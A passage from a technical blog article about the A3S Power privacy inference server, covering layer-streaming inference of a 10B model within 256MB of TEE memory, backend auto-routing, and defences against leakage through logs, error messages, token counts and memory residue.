&lt;p&gt;This is A3S Power's unique innovation — other inference servers don't even have an attestation endpoint, let alone model attestation binding.&lt;/p&gt;

&lt;p&gt;The model identity is confirmed. But inference hasn't started yet. Because there's still a tricky engineering problem — the TEE's memory is too small.&lt;/p&gt;




&lt;h2&gt;
  
  
  5. Running a 10B Model in 256MB — The Secret of picolm Layer-Streaming Inference
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: The Model Doesn't Fit in Cheap Hardware
&lt;/h3&gt;

&lt;p&gt;A harsh reality of privacy inference: TEE environments typically have only 256MB to 512MB of EPC (Encrypted Page Cache). More broadly, if you want to run privacy inference on a $10 edge device — say, an embedded board with 256MB of memory — traditional inference engines will sentence you to death.&lt;/p&gt;

&lt;p&gt;A 10B-parameter Q4_K_M quantized model requires about 6GB of memory. 6GB model, 256MB memory. 24x difference. It won't fit.&lt;/p&gt;

&lt;p&gt;The traditional solution is to use smaller models or more aggressive quantization. But this significantly degrades inference quality — and in security scenarios, model quality directly determines the ceiling of security capabilities (more on why later).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A3S Power's answer: you don't need expensive hardware, you need a smarter inference approach.&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  How A3S Power Solves It: picolm Layer-Streaming Inference
&lt;/h3&gt;

&lt;p&gt;The core insight is actually simple: &lt;strong&gt;at any given moment, the forward pass only needs the weights of one layer.&lt;/strong&gt; After processing layer N, layer N's weights are no longer needed — release them, load layer N+1.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Traditional inference (mistralrs / llama.cpp):
┌──────────────────────────────────────────────────┐
│  All 48 layers loaded in memory simultaneously    │
│  Peak memory ≈ model_size (e.g. 10B Q4_K_M ~6GB) │
└──────────────────────────────────────────────────┘

picolm layer-streaming inference:
┌──────────────────────────────────────────────────┐
│  mmap(model.gguf)  ← virtual address space only  │
│                       no physical memory alloc    │
│                                                   │
│  for layer in 0..n_layers:                        │
│    ┌─────────────────────────┐                    │
│    │ blk.{layer}.* tensors   │ ← OS pages in      │
│    │ (~125 MB for 10B Q4_K_M)│   weights on demand│
│    └─────────────────────────┘                    │
│    forward_pass(hidden_state, layer_weights)       │
│    madvise(MADV_DONTNEED) ← release physical pages │
│                                                   │
│  Peak memory ≈ layer_size + KV cache (FP16)       │
│             ≈ 125 MB + 68 MB (10B, 2048 ctx)      │
└──────────────────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Two Key Components — Let's Look at the Code
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Component one: &lt;code&gt;gguf_stream.rs&lt;/code&gt; — Zero-copy GGUF parser&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Opens the GGUF file via &lt;code&gt;mmap(MAP_PRIVATE | PROT_READ)&lt;/code&gt;. Parses the header (v2/v3), metadata, and tensor descriptors — but &lt;strong&gt;loads no weight data&lt;/strong&gt;. Each tensor is recorded as an &lt;code&gt;(offset, size)&lt;/code&gt; pair within the mmap region.&lt;/p&gt;

&lt;p&gt;When picolm requests a layer's weights, &lt;code&gt;tensor_bytes(name)&lt;/code&gt; returns a &lt;code&gt;&amp;amp;[u8]&lt;/code&gt; slice pointing directly into the mmap — zero copy, zero allocation. The OS kernel pages in data on demand and automatically reclaims it under memory pressure.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;GGUF file (on disk):
┌────────┬──────────┬──────────────────────────────────┐
│ Header │ Metadata │ Tensor Data (aligned)             │
│ 8 bytes│ variable │ blk.0.attn_q | blk.0.attn_k | ...│
└────────┴──────────┴──────────────────────────────────┘
                          ↑
                    mmap returns &amp;amp;[u8] slice
                    pointing directly here
                    (no memcpy, no allocation)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Component two: &lt;code&gt;picolm.rs&lt;/code&gt; + &lt;code&gt;picolm_ops/&lt;/code&gt; — Layer-streaming forward pass&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Iterates from &lt;code&gt;blk.0.*&lt;/code&gt; to &lt;code&gt;blk.{n-1}.*&lt;/code&gt;, applying each layer's weights to the hidden state. After processing layer N, &lt;code&gt;madvise(MADV_DONTNEED)&lt;/code&gt; explicitly releases physical pages.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Simplified flow (actual code in src/backend/picolm.rs)&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;gguf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;GgufFile&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"model.gguf"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// mmap, only parses header&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;tc&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;TensorCache&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;build&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;gguf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;n_layers&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// one-time parse of tensor pointers&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;rope_table&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;RopeTable&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;head_dim&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;rope_dim&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;theta&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="k"&gt;mut&lt;/span&gt; &lt;span class="n"&gt;hidden&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nd"&gt;vec!&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mf"&gt;0.0f32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;n_embd&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="k"&gt;mut&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;ForwardBuffers&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="cm"&gt;/* pre-allocate all working buffers */&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;layer&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="o"&gt;..&lt;/span&gt;&lt;span class="n"&gt;n_layers&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nf"&gt;attention_layer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;mut&lt;/span&gt; &lt;span class="n"&gt;hidden&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;tc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;layer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pos&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;kv_cache&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;rope_table&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;mut&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nf"&gt;ffn_layer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;mut&lt;/span&gt; &lt;span class="n"&gt;hidden&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;tc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;layer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;activation&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;mut&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;tc&lt;/span&gt;&lt;span class="nf"&gt;.release_layer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;gguf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;layer&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;  &lt;span class="c1"&gt;// madvise(DONTNEED) — release physical pages&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Six Key Optimizations on the Hot Path
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;TensorCache&lt;/strong&gt;: All tensor byte slices and types are parsed once at load time into flat arrays. Hot path uses &lt;code&gt;layer * 10 + slot&lt;/code&gt; indexing — zero string formatting, zero HashMap lookups&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ForwardBuffers&lt;/strong&gt;: All working buffers (q, k, v, gate, up, down, normed, logits, scores, attn_out) pre-allocated once. Zero heap allocation during inference&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Fused vec_dot&lt;/strong&gt;: Dequantization + dot product in a single pass — no intermediate f32 buffer. Dedicated kernels for Q4_K, Q6_K, Q8_0&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rayon parallel matrix multiply&lt;/strong&gt;: Matrices with more than 64 rows use multi-threaded row parallelism&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;FP16 KV cache&lt;/strong&gt;: Keys and values stored as f16, converted on read. KV cache memory halved&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pre-computed RoPE&lt;/strong&gt;: cos/sin tables built at load time. No transcendental functions on the hot path&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Real-World Memory Comparison
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Model&lt;/th&gt;
&lt;th&gt;Traditional&lt;/th&gt;
&lt;th&gt;picolm Layer-Streaming&lt;/th&gt;
&lt;th&gt;Reduction&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;0.5B Q4_K_M (~350 MB)&lt;/td&gt;
&lt;td&gt;~350 MB&lt;/td&gt;
&lt;td&gt;~15 MB + KV&lt;/td&gt;
&lt;td&gt;23x&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3B Q4_K_M (~2 GB)&lt;/td&gt;
&lt;td&gt;~2 GB&lt;/td&gt;
&lt;td&gt;~60 MB + KV&lt;/td&gt;
&lt;td&gt;33x&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7B Q4_K_M (~4 GB)&lt;/td&gt;
&lt;td&gt;~4 GB&lt;/td&gt;
&lt;td&gt;~120 MB + KV&lt;/td&gt;
&lt;td&gt;33x&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10B Q4_K_M (~6 GB)&lt;/td&gt;
&lt;td&gt;~6 GB&lt;/td&gt;
&lt;td&gt;~125 MB + KV&lt;/td&gt;
&lt;td&gt;48x&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;13B Q4_K_M (~7 GB)&lt;/td&gt;
&lt;td&gt;~7 GB&lt;/td&gt;
&lt;td&gt;~200 MB + KV&lt;/td&gt;
&lt;td&gt;35x&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;70B Q4_K_M (~40 GB)&lt;/td&gt;
&lt;td&gt;~40 GB&lt;/td&gt;
&lt;td&gt;~1.1 GB + KV&lt;/td&gt;
&lt;td&gt;36x&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;KV cache uses FP16 storage (half the memory of F32). A 10B model at 2048 context length is about 68 MB.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A 10B model under picolm has a peak memory of about 193 MB (125 MB layer weights + 68 MB KV cache), fully runnable in 256 MB of memory.&lt;/strong&gt; This means a $10 edge device, a TEE VM with 256MB EPC, or even a memory-constrained container — all can run a 10B model with genuine semantic understanding capability. This is picolm's core value — not "barely runs," but making privacy inference accessible on any hardware.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why Is a 10B Model Critical? Not Just "Can Run," But "Can Work"
&lt;/h3&gt;

&lt;p&gt;You might ask: wouldn't a 0.5B small model inside the TEE be enough? Why specifically 10B?&lt;/p&gt;

&lt;p&gt;Because 10B is a critical capability threshold. In A3S's security architecture, the LLM inside the TEE doesn't just answer questions — it carries three core security responsibilities:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Responsibility one: Safety Gate.&lt;/strong&gt; In an Agent execution chain, every operation needs security review — does the user's input contain injection attacks? Does the Agent-generated code have malicious behavior? Are the tool call parameters reasonable? These judgments require sufficient language understanding capability. A 0.5B model can do simple keyword matching, but against carefully crafted adversarial inputs (like multi-layered nested prompt injection), its judgment is far from adequate. A 10B model has genuine semantic understanding, capable of identifying complex attack patterns that "look harmless but are actually attempting privilege escalation."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Responsibility two: Data Redaction and Distribution (Privacy Router).&lt;/strong&gt; When sensitive data needs to leave the TEE boundary — such as sending inference results to external services, or writing logs to persistent storage — the data must first be redacted. This isn't simple regex replacement. A text containing "Client [Name], account ending in 8832, holds 500,000 shares of AAPL, unrealized gain $120M" requires the model to understand which parts are retainable public market information (AAPL ticker symbol) and which must be redacted as client privacy ([Name], account number, position size). A 10B model can perform context-aware intelligent redaction, rather than crudely marking the entire text as sensitive. Only redacted data can be safely distributed to downstream systems outside the TEE.&lt;/p&gt;

&lt;p&gt;Here's a concrete example. Suppose an AI Agent needs to query a database for client information to answer an analyst's question:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Analyst query: "Help me find clients with large redemptions in the past week and analyze possible reasons"

Agent executes inside TEE:
┌─────────────────────────────────────────────────────────────────┐
│  TEE encrypted memory (hardware-isolated, unreadable externally) │
│                                                                   │
│  1. Agent calls SQL tool to query database:                       │
│     SELECT name, account_id, amount, fund_name, redeem_date       │
│     FROM redemptions WHERE amount &amp;gt; 1000000                       │
│     AND redeem_date &amp;gt; NOW() - INTERVAL 7 DAY                     │
│                                                                   │
│  2. Database returns raw data (inside TEE, plaintext is safe):    │
│     ┌──────────────────────────────────────────────────────┐      │
│     │ [Client A] | 6621-8832 | $520,000  | Stable Growth A | 02-18│
│     │ [Client B] | 6621-4471 | $380,000  | Tech Pioneer B  | 02-19│
│     │ [Client C] | 6621-9953 | $1,200,000| Stable Growth A | 02-20│
│     └──────────────────────────────────────────────────────┘      │
│                                                                   │
│  3. 10B model analyzes data, generates insight (inside TEE):      │
│     "Stable Growth A fund saw concentrated redemptions            │
│      Feb 18-20, totaling $2.1M across 2 clients.                 │
│      Possible reason: fund NAV declined 3.2%, triggering          │
│      stop-loss thresholds."                                       │
│                                                                   │
│  4. 10B model performs intelligent redaction on output (key step):│
│     ┌──────────────────────────────────────────────────────┐      │
│     │ Retain: fund name (public info), redemption trend,   │      │
│     │         time range, aggregate amount, analysis        │      │
│     │ Redact: client names → [Client A/B/C],               │      │
│     │         account numbers → removed,                    │      │
│     │         individual amounts → fuzzy ranges             │      │
│     └──────────────────────────────────────────────────────┘      │
│                                                                   │
└─────────────────────────────────────────────────────────────────┘
                              │
                              ▼ Redacted data leaves TEE
┌─────────────────────────────────────────────────────────────────┐
│  What the analyst sees:                                           │
│                                                                   │
│  "Stable Growth A fund saw concentrated redemptions Feb 18-20,   │
│   totaling approximately $2M, involving a small number of        │
│   clients. Possible reason: fund NAV declined 3.2%, triggering   │
│   some clients' stop-loss thresholds.                            │
│   Recommend monitoring this fund's liquidity risk."              │
└─────────────────────────────────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note the key point in this flow: &lt;strong&gt;the original client names, account numbers, and exact amounts never leave the TEE encrypted memory.&lt;/strong&gt; The analyst gets the business insight they need (which fund is seeing redemptions, possible reasons, risk recommendations), but sees no information that could identify specific clients.&lt;/p&gt;

&lt;p&gt;A 0.5B model can't do this — it can't understand that "[Name]" is a person's name that needs redaction while "Stable Growth A" is a fund name that can be retained. It also can't determine that "$520,000" should be fuzzed to a range rather than completely deleted. This context-aware intelligent redaction requires 10B-level semantic understanding.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Responsibility three: Gatekeeper for Sensitive Tool Calls (Tool Guard).&lt;/strong&gt; AI Agents interact with the external world through tools — executing shell commands, reading/writing files, calling APIs, accessing databases. Some tool calls involve sensitive operations: deleting production data, sending emails, modifying permissions, accessing key management systems. Approval for these operations cannot be delegated to systems outside the TEE (because external systems may be compromised) — it must be done inside the TEE by a model smart enough to judge: "Is this tool call within the authorized scope of the current task? Are the parameters reasonable? Is there a risk of privilege escalation?" A 10B model has the capability to understand complex tool call semantics and make accurate allow/deny decisions in milliseconds.&lt;/p&gt;

&lt;p&gt;These three responsibilities share a common characteristic: &lt;strong&gt;they are all decision points on the security-critical path, where wrong judgments directly lead to data leakage or system compromise.&lt;/strong&gt; Using a 0.5B model for these tasks is like having an intern review nuclear plant safety protocols — capability mismatch. 10B is currently the best balance achievable within TEE memory constraints: powerful enough to handle security decisions, yet small enough to run smoothly in 256MB EPC.&lt;/p&gt;

&lt;p&gt;picolm makes this balance possible. Without layer-streaming inference, you can only run a 0.5B model in 256MB — those security responsibilities would degrade to simple rule matching, easily bypassed by attackers.&lt;/p&gt;

&lt;h3&gt;
  
  
  Auto-Routing: You Don't Need to Manually Choose a Backend
&lt;/h3&gt;

&lt;p&gt;A3S Power doesn't only have picolm as an inference backend. Its architecture defines a key abstraction — the &lt;code&gt;Backend&lt;/code&gt; trait — where any inference engine that implements this trait can be plugged in. Three backends are built in, covering the complete hardware spectrum from $10 edge devices to high-end GPU TEE servers:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Hardware Condition              Auto-selected Backend           Characteristics
──────────────────────────     ─────────────────────────     ──────────────────────────
256MB memory, no GPU            picolm (pure Rust streaming)   O(layer_size) memory, 10B model
(edge device / TEE EPC)

Sufficient memory, no GPU       mistralrs (pure Rust candle)   Full load, faster inference
(standard server / large EPC)   ★ Default backend

GPU TEE environment             llama.cpp (C++ bindings)       GPU acceleration, max throughput
(AMD SEV-SNP GPU TEE)           or mistralrs + CUDA
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This means A3S Power isn't a specialized tool that only works under extreme conditions — it's an &lt;strong&gt;inference platform that automatically upgrades with hardware conditions&lt;/strong&gt;. Today you use picolm on a 256MB edge device to run a 10B model for security decisions; tomorrow your TEE server gets a GPU, and the same code, same config automatically switches to the GPU-accelerated backend, boosting inference speed by tens of times.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;BackendRegistry&lt;/code&gt; implements TEE-aware auto-routing. &lt;code&gt;find_for_tee()&lt;/code&gt; reads available memory from &lt;code&gt;/proc/meminfo&lt;/code&gt; as an EPC approximation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Model size ≤ 75% EPC → use mistralrs (full load, faster)
Model size &amp;gt; 75% EPC → use picolm (layer-streaming, less memory)
GPU available and backend supports it → prefer GPU-accelerated backend
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The 75% threshold leaves room for working buffers, KV cache, and OS overhead. Completely transparent to users — just send requests, the system automatically selects the best backend. In a typical 256MB EPC scenario, a 10B model automatically routes to picolm, while a 0.5B model can be fully loaded with mistralrs.&lt;/p&gt;

&lt;p&gt;And the &lt;code&gt;Backend&lt;/code&gt; trait is open — you can implement your own inference backend (such as integrating TensorRT-LLM or other GPU inference frameworks), register it with &lt;code&gt;BackendRegistry&lt;/code&gt;, and immediately gain all of A3S Power's security capabilities: TEE attestation, model binding, log redaction, encrypted model loading. The security layer and inference layer are completely decoupled.&lt;/p&gt;

&lt;p&gt;That prompt is now being inferred. But during inference, there are some information leakage channels you might not have thought of.&lt;/p&gt;




&lt;h2&gt;
  
  
  6. Logs, Error Messages, Token Counts — Every One Can Betray You
&lt;/h2&gt;

&lt;p&gt;TEE hardware encryption protects data in memory from being read externally. But privacy protection isn't just memory encryption. Logs, metrics, error messages, and even token counts produced by the inference server itself can all become channels for information leakage.&lt;/p&gt;

&lt;p&gt;Let's address each one.&lt;/p&gt;

&lt;h3&gt;
  
  
  Leakage Channel One: Logs
&lt;/h3&gt;

&lt;p&gt;When &lt;code&gt;redact_logs = true&lt;/code&gt;, &lt;code&gt;PrivacyProvider&lt;/code&gt; automatically strips inference content from all log output. Redaction covers 10 sensitive JSON keys:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Key&lt;/th&gt;
&lt;th&gt;Coverage Scenario&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;content&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Chat message content&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;prompt&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Completion request prompt&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;text&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Text output&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;arguments&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Tool call arguments&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;input&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Embedding request input&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;delta&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Streaming delta&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;system&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;System prompt&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;message&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Generic message field&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;query&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Query field&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;instruction&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Instruction field&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;See the effect:&lt;/p&gt;

&lt;p&gt;Before redaction:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"content"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"Client [Name], holds 500,000 shares of AAPL..."&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"model"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"llama3"&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After redaction:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"content"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"[REDACTED]"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"model"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"llama3"&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Key design decision: redaction executes before log writing, not as post-processing. Sensitive data &lt;strong&gt;never&lt;/strong&gt; appears in log files — even if an attacker gets the log files, they can't recover the inference content.&lt;/p&gt;

&lt;h3&gt;
  
  
  Leakage Channel Two: Error Messages
&lt;/h3&gt;

&lt;p&gt;Error messages during LLM inference may contain prompt fragments. For example, a tokenization error might echo part of the prompt content in the error message. The &lt;code&gt;sanitize_error()&lt;/code&gt; function detects and strips these leaks:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Before sanitization: "Tokenization failed for prompt: Client [Name] holds 500,000 shares of AAPL..."
After sanitization:  "Tokenization failed for prompt: [REDACTED]"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It recognizes prefixes like &lt;code&gt;prompt:&lt;/code&gt;, &lt;code&gt;content:&lt;/code&gt;, &lt;code&gt;message:&lt;/code&gt;, &lt;code&gt;input:&lt;/code&gt;, and truncates everything after them.&lt;/p&gt;

&lt;h3&gt;
  
  
  Leakage Channel Three: Token Count Side Channel
&lt;/h3&gt;

&lt;p&gt;This one is easy to overlook. Precise token counts can be used to infer the length and content characteristics of a prompt — this is a side-channel attack.&lt;/p&gt;

&lt;p&gt;When &lt;code&gt;suppress_token_metrics = true&lt;/code&gt;, A3S Power rounds token counts in responses to the nearest 10:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Actual token count: 137 → Returns: 140
Actual token count: 42  → Returns: 40
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Simple, but effective. Eliminates information leakage from precise token counts while retaining sufficient precision for billing and monitoring.&lt;/p&gt;

&lt;h3&gt;
  
  
  Leakage Channel Four: Memory Residue
&lt;/h3&gt;

&lt;p&gt;The inference request is complete, but the prompt and response data may still linger in memory — until overwritten by other data. During this window, memory dump attacks can recover this data.&lt;/p&gt;

